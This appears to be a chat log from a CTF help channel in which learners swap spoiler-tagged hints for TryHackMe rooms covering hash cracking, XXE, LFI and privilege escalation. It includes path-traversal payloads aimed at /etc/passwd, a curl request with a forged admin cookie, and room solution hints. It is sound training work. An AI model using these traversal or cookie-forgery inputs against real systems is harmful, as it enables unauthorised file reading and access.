If you can post your questions here, more folks will be able to assist. In which step are you currently stuck on?

got to the /r/a/b/b/i/t

stage

after a bit of enumeration

bit stuck now

Did you get the password for || Alice ||?

no

I just got an excerpt from the book

💀

There should be another page there after following the rabbit where you can find the password.

How do I find it?

oh wait

nvm

should've taken a closer look

💀

I understood you correctly that ||I see a hash if I look at the site's code page.
And it needs to be hacked in some way?
(this hash is kind of weird for hacking)||

What room is this

Ah found it. Mustacchio

Did you find a peculiar webpage?

What is called the ||"admin panel"||
It's just that the other pages didn't arouse my strong interest, there's nothing unusual about them.

Have you looked at the site hosted || in a non-standard port ||?

What is called the ||"admin panel"||
I don't see any other interesting sites.

I recall the credentials for it weren't particularly hard to obtain.

Maybe so, another question|| is should I just brutforcing the password or somehow crack the hash that is in the page code?||

It should be || cracking the hash ||.

Do I need to ||do some manipulations with the allocated cache?
I tried to hack it in various ways, but I don't understand how it breaks.
That's why I have doubts, maybe I'm banging on the wrong door?||

Hmm... I'll check my notes again. To my recollection, there was a clue on how to crack it. Have you tried || CyberChef ||?

interestingly, we are talking about ||the same hash.
I threw it into CyberChef, it did not react to this hash in any way, and I went to check further.||

That’s not the hash.

I found the credentials and logged in also i found an ftp port. I downloaded the files. 3 pcap files , em i at the right direction ?

Yes

I'm in the simple CTF room and am stuck. I'm at the admin login page and not sure how to move forward. Any hints, help, or advice would be appreciate.

Have you looked or researched for possible exploits to any vulnerable components of the site?

yes and found one

not sure that it is possible yet without access

What did you find?

the CVE-2019-*****

is that what you mean?

I found the admin login page and the CVE for the site.

Have you tried the CVE?

Can somebody give me a nudge on Overpass 1?

I managed to find the ||/admin/|| page

but I can't seem to find anything else

Walk through the application, what can you see, etc.

Broken auth

I looked through the login file earlier but turns out I missed the vulnerability

huh

what

I reloaded it multiple times

and it changed

nvm I accidentally exploited the vuln

lmao

In bookstore ctf, is LFI in parameter that is in documentation for api or I need to fuzz new parameter?

I can’t wget the alpine file on gaming server I tried with quotes all ips and did everything the walkthroughs did still nothing

I ran the python3 -m http.server tooidk

From your VM?

box-mustacchio
Does this secret page have anything to do with subdomains or virtual hosts?
||I only found one page on a non-standard port, but in its code you said it wasn't a hash.
Maybe I'm using the wrong word list to search for this "peculiar" page on a non-standard port?||
||Everyone says that there should be no problems in finding the code, but for some reason I don't see it point-blank.||

Fuzz

Nah, they should be found under a directory with directory listing enabled.

I didn't quite understand the phrase "directory listing enabled"
where should it be enabled?🤷‍♂️
for the second time, I'm recursively going through a site with a high port, with the most voluminous lists of words.

Can you send the room link?

https://tryhackme.com/room/mustacchio

Once again, in order,
||(1) I have to find a "peculiar" page,
(2) I have to find a hash on it ( it is hidden in the code of this page),
(3) decrypt it,
(4) apply the received code (pass) to log in to the "admin" page.||
Is that right?

Yep.

Its not actually hidden, its found in a file you'll have to download.

But to download it, I need to find this "peculiar" page. Which I have a problem with.😔
Is she definitely on a high port?

Nah, port 80 is fine.

In my attached screenshot, does this directory even exist or not, and do I need to continue searching through the lists further?
I was advised to find it on ||the site on a non-standard port||
#room-hints message

Try it on port 80

now everything has worked out as it should, I was a little confused by the fact that it is worth paying attention to the page with a high port.
And I only scanned the regular page in passing.
Thanks, @young gulch for the help!

Gave +1 Rep to @young gulch

I'm still on valey room. I downloaded the pcap files and tried to retrieve useful information but i couldn't find some! I used the strings command qnd i was able to follow with the ftp pcap file but i wasn't able to retrieve the text files included in it.

You should find some || credentials || in it. Did you look at traffic at || protocol level and click on follow stream ||?

Apologies if I gave you a misleading hint as that is what I can recall from the room (though I haven't gained initial access on it yet).

It's okay, thanks, I appreciate any hints.) The main thing is I figured it out. And now I'm going to think about how to apply XXE. As I understand it, it is not quite standard, and even the protection is worth it or something like that.

Gave +1 Rep to @tropic garden

I have a question regarding: https://tryhackme.com/room/agentsudoctf. Task 2, question 3. I found the answer with the help of the hint. But how could I have found the agent without the hint? I can't find a hint in the Burp Suite either.

Is this the room with a note from || Agent T ||? If it is, you would have gotten the name by using || T (as an alphabet letter) || as a hint and doing a brute force against the user-agent field using || the letters A to Z ||.

Yeah, that's where I'm stuck as well. I did look at a write up a couple of months back, but I already forgot which one worked (which I intentionally did so I can read up on XXE before I work on it again).

OK - so its a try an error. Thanks!

You can also look at it that way.

I am just wondering, how the browser knows, when to open that specific php Site. I cant se anything in the sourcecode nor in burp.

something like if agent=xx then open xx.php

The user-agent information is part of the header of an HTTP request and it is being read as such by the web application (and not the browser). As you mentioned, there could be code at the web application instructing it to read the user-agent information included in the request and do a specific action or in this case, open the said page containing the message for || Agent C ||.

You won't see the entire source code though as you can only see the information the web application sends as part of the response.

OK - I see. Thx

So I'm in the Windows Local Persistence room, at Task 4, trying to acquire flag8. I have a multi/handler setup in msfconsole, and transfered the rev-svc.exe to the target. I than reconfigured the THMservice3 parameters using the provided command, though I am unable to get a connection. I am not sure what I am missing to get this flag. Any help is appreciated and good help/hints get a roboboost thingy

@tropic garden if you're available

Oh.. I haven't done that room yet unfortunately.

If I remember correctly, its that room where you have to finish in one sitting otherwise, you'll have to start all over again.

What to look for privilege escalation?

Have you gained initial access to the target? If so, how have you enumerated the machine thus far - LinPeas, lse, etc.?

Yup

From my host machine I installed Kali on my external ssd since my vm kept crashing idk y even with a downgrade

To clarify, you are trying to copy the alpine image from your kali? What error are you getting? Did you include the port in your wget command?

Linenu, is it SUID ?

Which user are you currently at?

Can anyone help me?

Hey Guys, i would like to know if there is any alternative privilege escalation for the room "UltraTech" level medium.
I know that i can escalate my rights with docker and the suid, but im also interested in a second method.
Any idea?

thanks. B

Have you looked available write-ups? I did check a few before I saw an unintended path -

https://infosecjake.net/?p=416

Has anyone understood the meaning of the question at the machine "Chocolate Factory",
"change user to charlie"
What is the point and why change it?
We get to the machine in a completely different way!

I have gone through all the questions, but I want to understand why it is being asked and where do we change the user and from whom do we change it? Is he just confusing me? Or I didn't fully understand it, please decipher it.

How did you get initial access to the machine? More often than not, aren't web applications run using www-data?

Most likely, the question means:
""Find a way to connect to the server as - charlie"🤔

Or su charlie.

It's unlikely, because we don't know Charlie's real password.
||and the one that we know is only the password to log in to the web page.||
That's why I was confused by this question.

You ssh in.

no, I used ||id_rsa||

Alongside the ssh command, yes?

Yeah

And did you get in?

Yeah

Ah, I think this question was just a little side quest in the room.

I first tried ||to get to the server via www-data, but no shells worked through the command and|| I just used another way.

that's what I mean, this question would be logical if you first got into the system with a technical account, and then you need to raise your rights to a real user. and you change it to Charlie. There is a logic here. as it is, I don't see this logic, that's why I asked this question.

Yeah, I understand your PoV

This is a community created room, not one from TryHackMe.

okay, let's write it off to the community)

I'll check my notes on what worked when I get a chance and let you know.

thanks for the reply, nothing there, all uses the suid and the docker to PE. :/
i was hoping to find a differnt way. 🙂

Gave +1 Rep to @tropic garden

hi all i am Stuck on reboot system where linpeas highlighting and have no clue for privesc

are you guys can show me something

What room is this for?

It's a hidden gem

??

it's a sideguest AOC

Yeah, I know what you're talking, and there is no hints at this stage.

but it's not hint i just need you guys guide me and tell me or give me something to learn about gaining privesc

So you want us to do the work for you? 🤔

no

may be you can assist me to the room that have a same problem

I believe they take a very strict line on it

Done!

Did you manage to do anything or advance in the attack on this machine [mustacchio].
I can't even check the POC that the "XXE" attack is working.
On the advice, I went through these lab work from "PortSwigger":
Lab: Exploiting XXE using external entities to retrieve files Lab: Exploiting XXE to perform SSRF attacks Lab: Exploiting XInclude to retrieve files Lab: Exploiting XXE via image file upload
But I still didn't understand something, yet the tags (Name-Authoe-Comment) appear in "Responses", not in "Requests".
I want to understand what I'm missing, the machine can't be so complicated that I haven't been able to solve it for more than a month😅
Maybe someone in (DC) will tell me what the main step needs to be taken (the one that I'm missing) in order to move on myself.🙏

Have you seen the || backup or template format in the HTML code ||?

Yes, I saw it, but it doesn't tell me anything.
This is also due to the fact that ||the script makes it clear that the "XML" code was entered in the field.||
do I need to change:
||"Content-Type:" to "text/javascript"?||
||do I need to fuzzing a website and search for files with the extension (.bak)?||

If I often wrote or came across "xml\html" languages and scripts, then the code on the source page would make me understand something, but this is a set of letters for me.

yes, I found and read the file with the extension.
(but there is zero useful information in it)
||except for the "xml" format itself||

I managed to achieve the desired goal, just explain one nuance to me.
||I conducted all the experiments through the Burp Suite, how should I have guessed that the code had to be (necessarily) entered into the browser window itself!!!???||
🤦‍♂️

to crack wifi password looking at eapol protocol and it has 4 messages how do i crack do i need just 1 key or all

through wireshark

I think the backup request was the clue?

Hello please i need help with this CIRCL (Computer Incident Respons Center Luxembourg) published an event associated with PupyRAT infection. Your organisation is on alert for remote access trojans and malware in the wild, and you have been tasked to investigate this event and correlate the details with your SIEM. Use what you have learned from the room to identify the event and complete this task.

Answer the questions below
What event ID has been assigned to the PupyRAT event? I answered : 1146 but the system said that i'm wrong

Also for the Snort Group
Clear the previous log and alarm files and deactivate/comment out the old rule.

Create a rule to filter packets with the same source and destination IP and run it against the given pcap file. What is the number of packets that show the same source and destination address? I answered 10 and the system said that i'm wrong please guys help

can someone tell me if try hack mes explaination is wrong or just worded poorly. having troublr underrstanding why a user would be able to enter if its case sensitive

Imagine you have a website with an admin page found at example.com/admin
Now, your website made have case insensitive pages meaning you can go to example.com/adMIN or example.com/AdMin and it will load the admin page.

But, in your code, you're checking if the user is going to example.com/admin and if they are, double-check that they are indeed an admin.
In the example, they're using === which is checking the EXACT value. So, /admin and /aDMIN are not the same values.

Which means if they head to /admin it is checking if they are an admin, but /ADMIN the code isn't being exected and henceforth it's not checking that they're an administrator.

Cant find the flag 2 of the ctf room Easy Peasy . However i was able to successfully root the machine and find the other flags . Still cant find it flag 2 . What am i missing... : (

Can't remember as it has been a while since I completed the room. Have you looked at the || robots.txt file ||?

yes i found a hash gave it as user-agent still no luck . think i need to crack it . .but not able to crack it .

I don't think I used crackstation for it. It should be some online md5 cracking tool.

tried with hashesdotcom , md5decrypt ...no luck .

I haven't used this but can you give it a try -

https://www.dcode.fr/md5-hash

Or this one -

https://md5hashing.net/hash/md5

have you did this room? am i really supposed to crack it? or am i doing something wrong when im giving that as ||User-Agent|| this is the hash if you wanna take a look ||a18672860d0510e5ab6699730763b250||

Yes, but it has been months since I completed this one.

This one worked.

omg found!

This helped! thanks a lot . ive been trying to figure it out since afternoon . You are a saviour !

Gave +1 Rep to @tropic garden

Glad I could help. The only thing I can remember on this room was || getting a password and not using it to retrieve the data hidden in the image ||. 🤣

Hahah. .for that stegseek helped me with ease. Anyway my question is why we can't crack this hash with jtr or hashcat. .we can't always rely with online tools .

One thing I can think of is that it is not in the wordlist.

Hmm..they deliberately wanted us to use online tools.

Not sure of the intent, but definitely for users to do their research.

Yh if we were trying locally this would take hours right?

since here bruteforce is the only option and the output is in mix of alpha,num, symbols.

You can also use search-that-hash (https://github.com/HashPals/Search-That-Hash) which searchs across multiple sources (disclaimer, I'm one of the authors)

I'll add this in my tools. Many thanks!

Gave +1 Rep to @rustic sphinx

Hmm I'll give a try .

@tiny tapir you sure|| humans ||didn't work?

not when it was spelled wrong

some of these basic rooms i dont even read - nothing new for me to learn

Happy holidays to all!!!
I'm working on "CTF-Easy Peasy" and I can't figure out how to search for a hidden directory?
I have a hash, but I can't figure out how to crack it (if it's related to this question, of course). Tell me, please, what should I pay attention to?

What have you gotten thus far?

I have ||a hash from the original page of the site, in front of which it says:
"It Works For Me its encoded with ba....:"
I also have a word that I got when I cracked the hash from flag #3.||

It should be a directory after you crack it if I recall it correctly.

By the way, I have a question, why do they write "Crack the hash with" in the third question easypeasy.txt What is the flag 3?"
When the flag is found without any hacking of the hash.
I have not yet reached the point where the list of words provided in the task came in handy.

Aahh.. if I'm not mistaken, the one I supplied to that question was the || hash itself || and was accepted with no issues. Not certain if it had something to do with how the question was asked.

And I provided the flag for this question, which was lying in the open.😕

Did I understand correctly that after I crack the hash, it will give me just the name of this directory?
Does it need to be cracking using the list of words that were provided in the task?
I haven't been able to crack it yet, although I know what algorithm it was hashed with.

That or something along those lines. I remember using || CyberChef || for it, but can't remember if it was automatically detected.

@tropic gardenthank you very much, I incorrectly identified the format.
I went through all the available ones and it turned out to be hacked)

Glad I could help.

Here's a tool the developer recently posted about that you can use to help identify hashes -- https://github.com/HashPals/Search-That-Hash
Personally, i've seen some issues with a the same Base64 hash in CyberChef shows up as invalid, but then I use it somewhere else like appdevtools and it shows up https://appdevtools.com/base64-encoder-decoder.. Maybe a little more tolerant of something? not sure.. just some tools to add to your toolbox.

All, I'm looking to connect with some folks on the "Crack The Hash" room. I am currently complete on Level-1 hashes 1 & 5. I'd like some suggestions/advice. I'm currently using the THM AttackBox and I'm thinking that I'm not being offered enough muscle for cracking. I'm looking to move over to my own instance of Kali with more RAM/CPU. Anyways, I would appreciate being able to bounce some ideas of someone who's more experienced at the "Crack The Hash" room. TIA!

Aside from processing power, are you able to identify or determine the hash? If no, the tool above and name-that-hash could be of help to you.

Thank you for the response! I modified my particular approch to limit the rockyou wordlist to the requisite number of characters that the hint pointed to. Just doing that allowed my local VM to crack one of the hashes in under 30 secs.

Gave +1 Rep to @tropic garden

@trim haven or might @ripe hedge if awake

I'm working on the nmap free module with task 11

it's asking "What optional argument can the ftp-anon.nse script take?"

I'm not seeing anything that would give the answer or a hint to the answer

and I've used the help command which did nothing for the answers

The task says that there is a website for more information about each script, go to the link provided in the task and then go to "NSE scripts" and look down the list till you find the page for the correct script.

Thanks

I found it

Now I'm looking for some dependancies I can't seem to find in the docs for smb-os-discovery.nse

same module

and the site that's given with the scripts help command is dead

The hint says to read the Lua script for your answer, you can grep it out to make it easier or manually look through it.

Ok... I didn't understand that correctly

So I tried to cd into the smb but it's saying it's not a file or directory even though it clearly is

as I looked at it by ls

I wish I can show a ss

Where are you trying to cd? You can read the file from wherever give you type out the full path. If you want to be within the path of the nse files then you can cd /usr/share/nmap/scripts. You can't cd into the smb-os-discovery.nse itself because it is a file not a directory. You can send screenshots if you verify.

so then would I do grep "dependencies" by itself or specifiy the smb file?

You would specify the filename, if you are in the directory of the file you can cat smb-os-discovery.nse | grep "dependencies", if you are not in the directory then you would have to specify the full path like I did in my screenshot before. The cat command is what reads the file and the grep command is what sorts out only the keyword you are looking for.

Also, I'm performing an Xmas ping and I'm only getting 1 port respond when using the given IP

nevermind

Ok

I was able to finish the module. Thanks for the help

Gave +1 Rep to @green sedge (current: #50 - 132)

Hi! I'm a little stupid in the room - "Lian_Yu", you need to get to SSH, there is a password, but I can't find a name!😅
I've gone through all the aliases of the character, but maybe I'm looking in the wrong direction.
Is it necessary to brutforced the name or is there a direct hint or a file for this?

Have you already enumerated the web pages / directories? The name should be there somewhere if I remember correctly. I'll have to check my notes tomorrow though.

Yes, I enumerated everything.
But I don't recall any mention of a specific name there.
I even put all the possible names from the site and from the wiki and the intended ones in my list of words.
Through hydra, he very quickly realizes that this is not the case.

I used cewl to make a wordlist from the enumerated pages I found and it worked. After I completed the room, I noticed that I didn't need the wordlist because what you need should be on the FTP server.

Yes, it depends on how the challenge was designed and it could vary.

I found the name anyway and it's not on the website 🙂
hydra helped out when I put all the names found in a completely different place in it.)😎

Ok so not really specific to a room but I've notice it can be difficult to edit files when I've got a shell. Does anyone know of a good way to overwrite or edit files in a shell?

use vim or vi

doesn't work tho

bugs out

when you got rev shell back, do you stabilize that shell? if is not

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Cant get the flag 2 of ctf room Archangel . Any hints to find the source code?

Hi, I'm solving the "Year of the Rabbit" room
||. I heard a hint in the video itself.
But I don't understand what I should find through Burp and on which page?||
Maybe where else is the secret clue hidden?
I've been sitting over a "simple" box all day)))

you need to examine the requests made by your browser closely .

And he's always the same

I didn't see anything interesting in the requests.

Use the|| developer tools -> Network ||while refreshing that page .

wait...did you check the other files in the ||/assets||

Damn, I didn't check the stylesheet carefully.🤦‍♂️
I just skimmed through it)
yes, there was an interesting thing there.
I'll work on it.
Thank you.
||But there was no hint in the video that you need to look for something in the developer tools)||

hah yh .Not always they'll give us hints. .we should try out every possible methods till we get something . 😄

still...Not sure how i can read the code. .guys anybody? i tried LFI wordlists and doing manually..didnt find anything interesting yet .

You don't need to view the source code.

okay..but how can i view passwd file to see thats working. .(give me only hints pls)

I mean, I like ..//

i think that isn't working here. ive tried those.

How many?

/..//..//..//..//..//etc/passwd ?

yes not working.. i'll share the full url ||http://mafialive.thm/test.php?file=/..//..//..//..//..//etc/passwd||

oh wait.

Yeah, you're missing part of the URL.

i changed that. .still nothing. . isnt this way i should give? ||http://mafialive.thm/test.php?view=/..//..//..//..//..//etc/passwd ||

No. 🙂

oh what im i missing. .

The directory where you can LFI.

i tried running this wordlist ||/usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt|| along with the encoding you mentioned. ...still nothing .

https://highon.coffee/blog/lfi-cheat-sheet/

https://book.hacktricks.xyz/pentesting-web/file-inclusion#basic-lfi-and-bypasses

These could help.

thank you . i'll go through it .

Gave +1 Rep to @lucid junco (current: #2 - 1835)

Hi everyone! Awesome to be here 🙂
I am currently doing the "File Inclusion" room and try to solve the final challenges. (Task 8, Question 2). I didnt find a thread regarding this topics. So I will just start directly with my question:
As I said, the job is to insert a local file inclusion. When I first access the page, it wants me to refresh (text displayed on the webpage). So I refresh and get the message "Welcome Guest!
Only admins can access this page!"
So I checked the cookies, found the THM cookie and send a curl request as following:
curl -H "Cookie: THM=admin" http://10.10.6.28/challenges/chall2.php

Result:
The webpage is returned, containing the text
"This is a admin web page! Get the flag!"

So far so good. But now I am stuck, because I dont find an input form anywhere and dont now how to insert my LFI.

Thats my big problem: how can i request the flag (which is in /etc/flag2)
I tried to append "?file=../../../etc/flag2" but it didnt work

Also deviations like "?file=xarewa" dont even give me an error or anything

Can anyone give me a hint regarding this please?

I add the webpage content to make sure the circumstances are clear:

<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Lab #Challenge-2</title>

<!-- Bootstrap core CSS -->
<link href="./css/bootstrap.min.css" rel="stylesheet">

<!-- Custom Stylesheet -->
<link href="./css/style.css" rel="stylesheet">

<!-- Core libraries bootstrap & jquery -->
<script src="./js/bootstrap5.min.js"></script>
<script src="./js/jquery-3.6.0.min.js"></script>

<!-- Custom JS code -->
<script src="./js/script.js"></script>

</head>

<header>

<div class="container">
<ul class="nav">
<li class="nav-item">
<a class="nav-link" href="./index.php">Home</a>
</li>
<li class="nav-item">
<a class="nav-link">/</a>
</li>
<li class="nav-item">
<a class="nav-link active" >Lab #Challenge-2</a>
</li>
</ul>
</div>
</header>
<body>
<div class="container" style="padding-top: 5%;">
<h1 class="display-4">File Inclusion Lab</h1>
<p class="lead">Lab #Challenge-2: Include a file in the input form below
<hr class="my-4">

    <div class='mt-5 mb-5'>
      <h5>Current Path</h5>
      <div class='file-Location'><code>/var/www/html</code></div>
    </div>
    <div>
      <h5>File Content Preview of <b>admin</b></h5>
      <code><div class="alert alert-success" role="alert">Welcome admin<br></div>This is a admin web page! Get the flag!

</code>
</div> </body>
</html>

Check:
<h5>File Content Preview of <b>admin</b></h5>
(:

You're going in the right direction, just know that there is another location that you can do File Inclusion other than the ?file= parameter in the URL. 😉

Thank you so much! Found the solution 🙂

Hello goodnight

Could anyone help me with these questions

Walking An Application
Task 3 Viewing The Page Source

What is the flag from the HTML comment?
What is the flag from the secret link?
What is the directory listing flag?
What is the framework flag?

What have you tried thus far?

Asking this server in 5 different times in different channels

Is that so? Didn't notice. 😅